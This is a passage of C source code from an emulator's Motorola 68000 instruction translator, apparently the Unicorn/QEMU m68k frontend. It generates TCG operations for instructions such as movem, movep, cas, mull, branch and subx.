do_addr_fault; } break; case 4: /* indirect pre-decrement */ if (is_load) { /* pre-decrement is not allowed */ goto do_addr_fault; } /* * We want a bare copy of the address reg, without any pre-decrement * adjustment, as gen_lea would provide. */ break; default: tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { goto do_addr_fault; } break; } addr = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, addr, tmp); incr = tcg_const_i32(tcg_ctx, opsize_bytes(opsize)); if (is_load) { /* memory to register */ for (i = 0; i < 16; i++) { if (mask & (1 << i)) { r[i] = gen_load(s, opsize, addr, 1, IS_USER(s)); tcg_gen_add_i32(tcg_ctx, addr, addr, incr); } } for (i = 0; i < 16; i++) { if (mask & (1 << i)) { tcg_gen_mov_i32(tcg_ctx, mreg(tcg_ctx, i), r[i]); tcg_temp_free(tcg_ctx, r[i]); } } if (mode == 3) { /* post-increment: movem (An)+,X */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); } } else { /* register to memory */ if (mode == 4) { /* pre-decrement: movem X,-(An) */ for (i = 15; i >= 0; i--) { if ((mask << i) & 0x8000) { tcg_gen_sub_i32(tcg_ctx, addr, addr, incr); if (reg0 + 8 == i && m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) { /* * M68020+: if the addressing register is the * register moved to memory, the value written * is the initial value decremented by the size of * the operation, regardless of how many actual * stores have been performed until this point. * M68000/M68010: the value is the initial value. */ tmp = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, tmp, tcg_ctx->cpu_aregs[reg0], incr); gen_store(s, opsize, addr, tmp, IS_USER(s)); tcg_temp_free(tcg_ctx, tmp); } else { gen_store(s, opsize, addr, mreg(tcg_ctx, i), IS_USER(s)); } } } tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); } else { for (i = 0; i < 16; i++) { if (mask & (1 << i)) { gen_store(s, opsize, addr, mreg(tcg_ctx, i), IS_USER(s)); tcg_gen_add_i32(tcg_ctx, addr, addr, incr); } } } } tcg_temp_free(tcg_ctx, incr); tcg_temp_free(tcg_ctx, addr); } DISAS_INSN(movep) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint8_t i; int16_t displ; TCGv reg; TCGv addr; TCGv abuf; TCGv dbuf; displ = read_im16(env, s); addr = AREG(insn, 0); reg = DREG(insn, 9); abuf = tcg_temp_new(tcg_ctx); tcg_gen_addi_i32(tcg_ctx, abuf, addr, displ); dbuf = tcg_temp_new(tcg_ctx); if (insn & 0x40) { i = 4; } else { i = 2; } if (insn & 0x80) { for ( ; i > 0 ; i--) { tcg_gen_shri_i32(tcg_ctx, dbuf, reg, (i - 1) * 8); tcg_gen_qemu_st8(tcg_ctx, dbuf, abuf, IS_USER(s)); if (i > 1) { tcg_gen_addi_i32(tcg_ctx, abuf, abuf, 2); } } } else { for ( ; i > 0 ; i--) { tcg_gen_qemu_ld8u(tcg_ctx, dbuf, abuf, IS_USER(s)); tcg_gen_deposit_i32(tcg_ctx, reg, reg, dbuf, (i - 1) * 8, 8); if (i > 1) { tcg_gen_addi_i32(tcg_ctx, abuf, abuf, 2); } } } tcg_temp_free(tcg_ctx, abuf); tcg_temp_free(tcg_ctx, dbuf); } DISAS_INSN(bitop_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; int op; TCGv src1; uint32_t mask; int bitnum; TCGv tmp; TCGv addr; if ((insn & 0x38) != 0) opsize = OS_BYTE; else opsize = OS_LONG; op = (insn >> 6) & 3; bitnum = read_im16(env, s); if (m68k_feature(s->env, M68K_FEATURE_M68000)) { if (bitnum & 0xfe00) { disas_undef(env, s, insn); return; } } else { if (bitnum & 0xff00) { disas_undef(env, s, insn); return; } } SRC_EA(env, src1, opsize, 0, op ? &addr: NULL); gen_flush_flags(s); if (opsize == OS_BYTE) bitnum &= 7; else bitnum &= 31; mask = 1 << bitnum; tcg_gen_andi_i32(tcg_ctx, QREG_CC_Z, src1, mask); if (op) { tmp = tcg_temp_new(tcg_ctx); switch (op) { case 1: /* bchg */ tcg_gen_xori_i32(tcg_ctx, tmp, src1, mask); break; case 2: /* bclr */ tcg_gen_andi_i32(tcg_ctx, tmp, src1, ~mask); break; case 3: /* bset */ tcg_gen_ori_i32(tcg_ctx, tmp, src1, mask); break; default: /* btst */ break; } DEST_EA(env, insn, opsize, tmp, &addr); tcg_temp_free(tcg_ctx, tmp); } } static TCGv gen_get_ccr(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; update_cc_op(s); dest = tcg_temp_new(tcg_ctx); gen_helper_get_ccr(tcg_ctx, dest, tcg_ctx->cpu_env); return dest; } static TCGv gen_get_sr(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ccr; TCGv sr; ccr = gen_get_ccr(s); sr = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, sr, QREG_SR, 0xffe0); tcg_gen_or_i32(tcg_ctx, sr, sr, ccr); tcg_temp_free(tcg_ctx, ccr); return sr; } static void gen_set_sr_im(DisasContext *s, uint16_t val, int ccr_only) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ccr_only) { tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, val & CCF_C ? 1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, val & CCF_V ? -1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_Z, val & CCF_Z ? 0 : 1); tcg_gen_movi_i32(tcg_ctx, QREG_CC_N, val & CCF_N ? -1 : 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_X, val & CCF_X ? 1 : 0); } else { TCGv sr = tcg_const_i32(tcg_ctx, val); gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, sr); tcg_temp_free(tcg_ctx, sr); } set_cc_op(s, CC_OP_FLAGS); } static void gen_set_sr(DisasContext *s, TCGv val, int ccr_only) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (ccr_only) { gen_helper_set_ccr(tcg_ctx, tcg_ctx->cpu_env, val); } else { gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, val); } set_cc_op(s, CC_OP_FLAGS); } static void gen_move_to_sr(CPUM68KState *env, DisasContext *s, uint16_t insn, bool ccr_only) { if ((insn & 0x3f) == 0x3c) { uint16_t val; val = read_im16(env, s); gen_set_sr_im(s, val, ccr_only); } else { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; SRC_EA(env, src, OS_WORD, 0, NULL); gen_set_sr(s, src, ccr_only); } } DISAS_INSN(arith_im) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; TCGv im; TCGv src1; TCGv dest; TCGv addr; int opsize; bool with_SR = ((insn & 0x3f) == 0x3c); op = (insn >> 9) & 7; opsize = insn_opsize(insn); switch (opsize) { case OS_BYTE: im = tcg_const_i32(tcg_ctx, (int8_t)read_im8(env, s)); break; case OS_WORD: im = tcg_const_i32(tcg_ctx, (int16_t)read_im16(env, s)); break; case OS_LONG: im = tcg_const_i32(tcg_ctx, read_im32(env, s)); break; default: g_assert_not_reached(); } if (with_SR) { /* SR/CCR can only be used with andi/eori/ori */ if (op == 2 || op == 3 || op == 6) { disas_undef(env, s, insn); return; } switch (opsize) { case OS_BYTE: src1 = gen_get_ccr(s); break; case OS_WORD: if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } src1 = gen_get_sr(s); break; default: /* OS_LONG; others already g_assert_not_reached. */ disas_undef(env, s, insn); return; } } else { SRC_EA(env, src1, opsize, 1, (op == 6) ? NULL : &addr); } dest = tcg_temp_new(tcg_ctx); switch (op) { case 0: /* ori */ tcg_gen_or_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 1: /* andi */ tcg_gen_and_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 2: /* subi */ tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, src1, im); tcg_gen_sub_i32(tcg_ctx, dest, src1, im); gen_update_cc_add(tcg_ctx, dest, im, opsize); set_cc_op(s, CC_OP_SUBB + opsize); DEST_EA(env, insn, opsize, dest, &addr); break; case 3: /* addi */ tcg_gen_add_i32(tcg_ctx, dest, src1, im); gen_update_cc_add(tcg_ctx, dest, im, opsize); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, im); set_cc_op(s, CC_OP_ADDB + opsize); DEST_EA(env, insn, opsize, dest, &addr); break; case 5: /* eori */ tcg_gen_xor_i32(tcg_ctx, dest, src1, im); if (with_SR) { gen_set_sr(s, dest, opsize == OS_BYTE); } else { DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } break; case 6: /* cmpi */ gen_update_cc_cmp(s, src1, im, opsize); break; default: abort(); } tcg_temp_free(tcg_ctx, im); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(cas) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv addr; uint16_t ext; TCGv load; TCGv cmp; MemOp opc; switch ((insn >> 9) & 3) { case 1: opsize = OS_BYTE; opc = MO_SB; break; case 2: opsize = OS_WORD; opc = MO_TESW; break; case 3: opsize = OS_LONG; opc = MO_TESL; break; default: /* unreachable */ abort(); } ext = read_im16(env, s); /* cas Dc,Du,<EA> */ addr = gen_lea(env, s, insn, opsize); if (IS_NULL_QREG(addr)) { gen_addr_fault(s); return; } cmp = gen_extend(s, DREG(ext, 0), opsize, 1); /* * if <EA> == Dc then * <EA> = Du * Dc = <EA> (because <EA> == Dc) * else * Dc = <EA> */ load = tcg_temp_new(tcg_ctx); tcg_gen_atomic_cmpxchg_i32(tcg_ctx, load, addr, cmp, DREG(ext, 6), IS_USER(s), opc); /* update flags before setting cmp to load */ gen_update_cc_cmp(s, load, cmp, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(ext, 0), load); tcg_temp_free(tcg_ctx, load); switch (extract32(insn, 3, 3)) { case 3: /* Indirect postincrement. */ tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, opsize_bytes(opsize)); break; case 4: /* Indirect predecrememnt. */ tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); break; } } DISAS_INSN(cas2w) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext1, ext2; TCGv addr1, addr2; TCGv regs; /* cas2 Dc1:Dc2,Du1:Du2,(Rn1):(Rn2) */ ext1 = read_im16(env, s); if (ext1 & 0x8000) { /* Address Register */ addr1 = AREG(ext1, 12); } else { /* Data Register */ addr1 = DREG(ext1, 12); } ext2 = read_im16(env, s); if (ext2 & 0x8000) { /* Address Register */ addr2 = AREG(ext2, 12); } else { /* Data Register */ addr2 = DREG(ext2, 12); } /* * if (R1) == Dc1 && (R2) == Dc2 then * (R1) = Du1 * (R2) = Du2 * else * Dc1 = (R1) * Dc2 = (R2) */ regs = tcg_const_i32(tcg_ctx, REG(ext2, 6) | (REG(ext1, 6) << 3) | (REG(ext2, 0) << 6) | (REG(ext1, 0) << 9)); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_cas2w(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } tcg_temp_free(tcg_ctx, regs); /* Note that cas2w also assigned to env->cc_op. */ s->cc_op = CC_OP_CMPW; s->cc_op_synced = 1; } DISAS_INSN(cas2l) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext1, ext2; TCGv addr1, addr2, regs; /* cas2 Dc1:Dc2,Du1:Du2,(Rn1):(Rn2) */ ext1 = read_im16(env, s); if (ext1 & 0x8000) { /* Address Register */ addr1 = AREG(ext1, 12); } else { /* Data Register */ addr1 = DREG(ext1, 12); } ext2 = read_im16(env, s); if (ext2 & 0x8000) { /* Address Register */ addr2 = AREG(ext2, 12); } else { /* Data Register */ addr2 = DREG(ext2, 12); } /* * if (R1) == Dc1 && (R2) == Dc2 then * (R1) = Du1 * (R2) = Du2 * else * Dc1 = (R1) * Dc2 = (R2) */ regs = tcg_const_i32(tcg_ctx, REG(ext2, 6) | (REG(ext1, 6) << 3) | (REG(ext2, 0) << 6) | (REG(ext1, 0) << 9)); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_cas2l_parallel(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } else { gen_helper_cas2l(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } tcg_temp_free(tcg_ctx, regs); /* Note that cas2l also assigned to env->cc_op. */ s->cc_op = CC_OP_CMPL; s->cc_op_synced = 1; } DISAS_INSN(byterev) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); tcg_gen_bswap32_i32(tcg_ctx, reg, reg); } DISAS_INSN(move) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; int op; int opsize; switch (insn >> 12) { case 1: /* move.b */ opsize = OS_BYTE; break; case 2: /* move.l */ opsize = OS_LONG; break; case 3: /* move.w */ opsize = OS_WORD; break; default: abort(); } SRC_EA(env, src, opsize, 1, NULL); op = (insn >> 6) & 7; if (op == 1) { /* movea */ /* The value will already have been sign extended. */ dest = AREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, dest, src); } else { /* normal move */ uint16_t dest_ea; dest_ea = ((insn >> 9) & 7) | (op << 3); DEST_EA(env, dest_ea, opsize, src, NULL); /* This will be correct because loads sign extend. */ gen_logic_cc(s, src, opsize); } } DISAS_INSN(negx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv z; TCGv src; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 1, &addr); gen_flush_flags(s); /* compute old Z */ /* * Perform substract with borrow. * (X, N) = -(src + X); */ z = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, src, z, QREG_CC_X, z); tcg_gen_sub2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, z, z, QREG_CC_N, QREG_CC_X); tcg_temp_free(tcg_ctx, z); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_X, QREG_CC_X, 1); /* * Compute signed-overflow for negation. The normal formula for * subtraction is (res ^ src) & (src ^ dest), but with dest==0 * this simplies to res & src. */ tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); /* Copy the rest of the results into place. */ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ DEST_EA(env, insn, opsize, QREG_CC_N, &addr); } DISAS_INSN(lea) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; reg = AREG(insn, 9); tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } tcg_gen_mov_i32(tcg_ctx, reg, tmp); } DISAS_INSN(clr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv zero; zero = tcg_const_i32(tcg_ctx, 0); opsize = insn_opsize(insn); DEST_EA(env, insn, opsize, zero, NULL); gen_logic_cc(s, zero, opsize); tcg_temp_free(tcg_ctx, zero); } DISAS_INSN(move_from_ccr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ccr; ccr = gen_get_ccr(s); DEST_EA(env, insn, OS_WORD, ccr, NULL); } DISAS_INSN(neg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src1, opsize, 1, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, dest, src1); set_cc_op(s, CC_OP_SUBB + opsize); gen_update_cc_add(tcg_ctx, dest, src1, opsize); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, dest, 0); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(move_to_ccr) { gen_move_to_sr(env, s, insn, true); } DISAS_INSN(not) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src1, opsize, 1, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_not_i32(tcg_ctx, dest, src1); DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } DISAS_INSN(swap) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv src2; TCGv reg; src1 = tcg_temp_new(tcg_ctx); src2 = tcg_temp_new(tcg_ctx); reg = DREG(insn, 0); tcg_gen_shli_i32(tcg_ctx, src1, reg, 16); tcg_gen_shri_i32(tcg_ctx, src2, reg, 16); tcg_gen_or_i32(tcg_ctx, reg, src1, src2); tcg_temp_free(tcg_ctx, src2); tcg_temp_free(tcg_ctx, src1); gen_logic_cc(s, reg, OS_LONG); } DISAS_INSN(bkpt) { gen_exception(s, s->base.pc_next, EXCP_DEBUG); } DISAS_INSN(pea) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } gen_push(s, tmp); } DISAS_INSN(ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; TCGv reg; TCGv tmp; reg = DREG(insn, 0); op = (insn >> 6) & 7; tmp = tcg_temp_new(tcg_ctx); if (op == 3) tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); else tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); if (op == 2) gen_partset_reg(tcg_ctx, OS_WORD, reg, tmp); else tcg_gen_mov_i32(tcg_ctx, reg, tmp); gen_logic_cc(s, tmp, OS_LONG); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(tst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv tmp; opsize = insn_opsize(insn); SRC_EA(env, tmp, opsize, 1, NULL); gen_logic_cc(s, tmp, opsize); } DISAS_INSN(pulse) { /* Implemented as a NOP. */ } DISAS_INSN(illegal) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } /* ??? This should be atomic. */ DISAS_INSN(tas) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src1; TCGv addr; dest = tcg_temp_new(tcg_ctx); SRC_EA(env, src1, OS_BYTE, 1, &addr); gen_logic_cc(s, src1, OS_BYTE); tcg_gen_ori_i32(tcg_ctx, dest, src1, 0x80); DEST_EA(env, insn, OS_BYTE, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(mull) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv src1; int sign; ext = read_im16(env, s); sign = ext & 0x800; if (ext & 0x400) { if (!m68k_feature(s->env, M68K_FEATURE_QUAD_MULDIV)) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } SRC_EA(env, src1, OS_LONG, 0, NULL); if (sign) { tcg_gen_muls2_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, src1, DREG(ext, 12)); } else { tcg_gen_mulu2_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, src1, DREG(ext, 12)); } /* if Dl == Dh, 68040 returns low word */ tcg_gen_mov_i32(tcg_ctx, DREG(ext, 0), QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, DREG(ext, 12), QREG_CC_Z); tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); set_cc_op(s, CC_OP_FLAGS); return; } SRC_EA(env, src1, OS_LONG, 0, NULL); if (m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); if (sign) { tcg_gen_muls2_i32(tcg_ctx, QREG_CC_N, QREG_CC_V, src1, DREG(ext, 12)); /* QREG_CC_V is -(QREG_CC_V != (QREG_CC_N >> 31)) */ tcg_gen_sari_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, 31); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, QREG_CC_Z); } else { tcg_gen_mulu2_i32(tcg_ctx, QREG_CC_N, QREG_CC_V, src1, DREG(ext, 12)); /* QREG_CC_V is -(QREG_CC_V != 0), use QREG_CC_C as 0 */ tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, QREG_CC_C); } tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); tcg_gen_mov_i32(tcg_ctx, DREG(ext, 12), QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } else { /* * The upper 32 bits of the product are discarded, so * muls.l and mulu.l are functionally equivalent. */ tcg_gen_mul_i32(tcg_ctx, DREG(ext, 12), src1, DREG(ext, 12)); gen_logic_cc(s, DREG(ext, 12), OS_LONG); } } static void gen_link(DisasContext *s, uint16_t insn, int32_t offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; reg = AREG(insn, 0); tmp = tcg_temp_new(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); gen_store(s, OS_LONG, tmp, reg, IS_USER(s)); if ((insn & 7) != 7) { tcg_gen_mov_i32(tcg_ctx, reg, tmp); } tcg_gen_addi_i32(tcg_ctx, QREG_SP, tmp, offset); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(link) { int16_t offset; offset = read_im16(env, s); gen_link(s, insn, offset); } DISAS_INSN(linkl) { int32_t offset; offset = read_im32(env, s); gen_link(s, insn, offset); } DISAS_INSN(unlk) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; TCGv tmp; src = tcg_temp_new(tcg_ctx); reg = AREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, src, reg); tmp = gen_load(s, OS_LONG, src, 0, IS_USER(s)); tcg_gen_mov_i32(tcg_ctx, reg, tmp); tcg_gen_addi_i32(tcg_ctx, QREG_SP, src, 4); tcg_temp_free(tcg_ctx, src); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(reset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_helper_reset(tcg_ctx, tcg_ctx->cpu_env); } DISAS_INSN(nop) { } DISAS_INSN(rtd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; int16_t offset = read_im16(env, s); tmp = gen_load(s, OS_LONG, QREG_SP, 0, IS_USER(s)); tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, offset + 4); gen_jmp(s, tmp); } DISAS_INSN(rts) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = gen_load(s, OS_LONG, QREG_SP, 0, IS_USER(s)); tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, 4); gen_jmp(s, tmp); } DISAS_INSN(jump) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; /* * Load the target address first to ensure correct exception * behavior. */ tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } if ((insn & 0x40) == 0) { /* jsr */ gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); } gen_jmp(s, tmp); } DISAS_INSN(addsubq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; TCGv val; int imm; TCGv addr; int opsize; if ((insn & 070) == 010) { /* Operation on address register is always long. */ opsize = OS_LONG; } else { opsize = insn_opsize(insn); } SRC_EA(env, src, opsize, 1, &addr); imm = (insn >> 9) & 7; if (imm == 0) { imm = 8; } val = tcg_const_i32(tcg_ctx, imm); dest = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, dest, src); if ((insn & 0x38) == 0x08) { /* * Don't update condition codes if the destination is an * address register. */ if (insn & 0x0100) { tcg_gen_sub_i32(tcg_ctx, dest, dest, val); } else { tcg_gen_add_i32(tcg_ctx, dest, dest, val); } } else { if (insn & 0x0100) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, val); tcg_gen_sub_i32(tcg_ctx, dest, dest, val); set_cc_op(s, CC_OP_SUBB + opsize); } else { tcg_gen_add_i32(tcg_ctx, dest, dest, val); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, val); set_cc_op(s, CC_OP_ADDB + opsize); } gen_update_cc_add(tcg_ctx, dest, val, opsize); } tcg_temp_free(tcg_ctx, val); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(tpf) { switch (insn & 7) { case 2: /* One extension word. */ s->pc += 2; break; case 3: /* Two extension words. */ s->pc += 4; break; case 4: /* No extension words. */ break; default: disas_undef(env, s, insn); } } DISAS_INSN(branch) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int32_t offset; uint32_t base; int op; base = s->pc; op = (insn >> 8) & 0xf; offset = (int8_t)insn; if (offset == 0) { offset = (int16_t)read_im16(env, s); } else if (offset == -1) { offset = read_im32(env, s); } if (op == 1) { /* bsr */ gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); } if (op > 1) { /* Bcc */ TCGLabel *l1 = gen_new_label(tcg_ctx); gen_jmpcc(s, ((insn >> 8) & 0xf) ^ 1, l1); gen_jmp_tb(s, 1, base + offset); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 0, s->pc); } else { /* Unconditional branch. */ update_cc_op(s); gen_jmp_tb(s, 0, base + offset); } } DISAS_INSN(moveq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, DREG(insn, 9), (int8_t)insn); gen_logic_cc(s, DREG(insn, 9), OS_LONG); } DISAS_INSN(mvzs) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv src; TCGv reg; if (insn & 0x40) opsize = OS_WORD; else opsize = OS_BYTE; SRC_EA(env, src, opsize, (insn & 0x80) == 0, NULL); reg = DREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, reg, src); gen_logic_cc(s, src, opsize); } DISAS_INSN(or) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv dest; TCGv src; TCGv addr; int opsize; opsize = insn_opsize(insn); reg = gen_extend(s, DREG(insn, 9), opsize, 0); dest = tcg_temp_new(tcg_ctx); if (insn & 0x100) { SRC_EA(env, src, opsize, 0, &addr); tcg_gen_or_i32(tcg_ctx, dest, src, reg); DEST_EA(env, insn, opsize, dest, &addr); } else { SRC_EA(env, src, opsize, 0, NULL); tcg_gen_or_i32(tcg_ctx, dest, src, reg); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), dest); } gen_logic_cc(s, dest, opsize); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(suba) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; SRC_EA(env, src, (insn & 0x100) ? OS_LONG : OS_WORD, 1, NULL); reg = AREG(insn, 9); tcg_gen_sub_i32(tcg_ctx, reg, reg, src); } static inline void gen_subx(DisasContext *s, TCGv src, TCGv dest, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; gen_flush_flags(s); /* compute old Z */ /* * Perform substract with borrow. * (X, N) = dest - (src + X); */ tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, src, tmp, QREG_CC_X, tmp); tcg_gen_sub2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, dest, tmp, QREG_CC_N, QREG_CC_X); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_X, QREG_CC_X, 1); /* Compute signed-overflow for substract. */ tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, dest); tcg_gen_xor_i32(tcg_ctx, tmp, dest, src); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, tmp); tcg_temp_free(tcg_ctx, tmp); /* Copy the rest of the results into place. */ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ } DISAS_INSN(subx_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src; int opsize; opsize = insn_opsize(insn); src = gen_extend(s, DREG(insn, 0), opsize, 1); dest = gen_extend(s, DREG(insn, 9), opsize, 1); gen_subx(s, src, dest, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), QREG_CC_N); } 